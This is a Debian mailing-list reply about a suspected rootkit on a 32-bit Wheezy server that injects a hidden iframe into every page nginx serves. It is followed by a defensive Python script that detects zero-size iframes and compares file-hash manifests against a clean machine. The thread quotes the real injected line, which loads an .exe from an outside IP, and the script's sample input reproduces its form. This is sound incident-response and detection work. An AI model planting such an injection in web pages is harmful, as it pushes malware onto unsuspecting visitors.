On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <fra...@efball.com> wrote:
> Last fall there was a debian 64-bit / nginx rootkit going around,
> now I've been hit with what sounds similar but on 32-bit wheezy.
>
> Here's a link to info on the previous 64-bit rootkit:
> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
>
> All files served by nginx have this line inserted at the top:
>
> <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
>
> Whatever it was isn't there anymore:
> Connecting to 122.226.137.123:1111... failed: Connection refused.
>
> I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> Debian Wheezy i386 machine in a safe environment and did a diff -r. No
> difference.
>
> No insmod line in /etc/rc.local
>
> I haven't been able to find anything. Googling doesn't show anything
> similar for debian wheezy i386, only squeeze 64-bit.
>
> I was using nginx-light from dotdeb.org. I uninstalled nginx and tried
> the nginx-light from debian wheezy but it made no difference.
>
> This machine was built on July 19th. I've uninstalled nginx. I'll hold
> off rebuilding for now, maybe somebody here has some ideas?
>
> E Frank Ball fra...@efball.com
Just out of curiosity, did you back up nginx and check it as well?

--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.
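A defender-side version of the two checks the thread does by hand, added here as an example that is not from either poster: scanning HTML that nginx served for zero-size iframe injections, and diffing a hash manifest of a directory such as the kernel module tree against one taken from a clean machine. The iframe src, file names and hashes in the sample input are constructed, not the thread's indicators.

```python
from __future__ import annotations
import hashlib
import re
from pathlib import Path

# An <iframe> with width=0 and height=0 renders invisibly; that is the shape of
# the line the thread reports prepended to every file nginx served.
_IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
_ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def find_hidden_iframes(body: str) -> list[str]:
    """Return the src of every zero-size iframe found in an HTML body."""
    hits = []
    for tag in _IFRAME_TAG.findall(body):
        attrs = {}
        for m in _ATTR.finditer(tag):  # handles quoted, unquoted and "src= url" forms
            attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
        if attrs.get("width", "").strip() == "0" and attrs.get("height", "").strip() == "0":
            hits.append(attrs.get("src", ""))
    return hits


def hash_tree(root: Path) -> dict[str, str]:
    """SHA-256 of every regular file below root, keyed by path relative to root."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifests(clean: dict[str, str], suspect: dict[str, str]) -> dict[str, list[str]]:
    """Files added, removed or changed on the suspect host relative to a clean manifest."""
    both = set(clean) & set(suspect)
    return {
        "added": sorted(set(suspect) - set(clean)),
        "removed": sorted(set(clean) - set(suspect)),
        "changed": sorted(k for k in both if clean[k] != suspect[k]),
    }


# Constructed sample input (TEST-NET address and made-up hashes, not the thread's IoCs).
SAMPLE_BODY = ('<iframe src= http://203.0.113.5:1111/x.exe width=0 height=0></iframe>\n'
               '<html><body><iframe src="https://example.org/embed" width="300" height="150">'
               '</iframe></body></html>')
CLEAN_MANIFEST = {"fs/ext4/ext4.ko": "aa" * 32, "net/ipv4/tcp_diag.ko": "bb" * 32}
SUSPECT_MANIFEST = {"fs/ext4/ext4.ko": "aa" * 32, "net/ipv4/tcp_diag.ko": "cc" * 32,
                    "drivers/misc/extra.ko": "dd" * 32}

if __name__ == "__main__":
    print("hidden iframes:", find_hidden_iframes(SAMPLE_BODY))
    print("module diff:", diff_manifests(CLEAN_MANIFEST, SUSPECT_MANIFEST))
```

Run hash_tree against a copy of the module tree taken from a boot off trusted media (or from the tarball Frank made), not on the live suspect system, because a kernel rootkit can hide or rewrite what a process on that system reads.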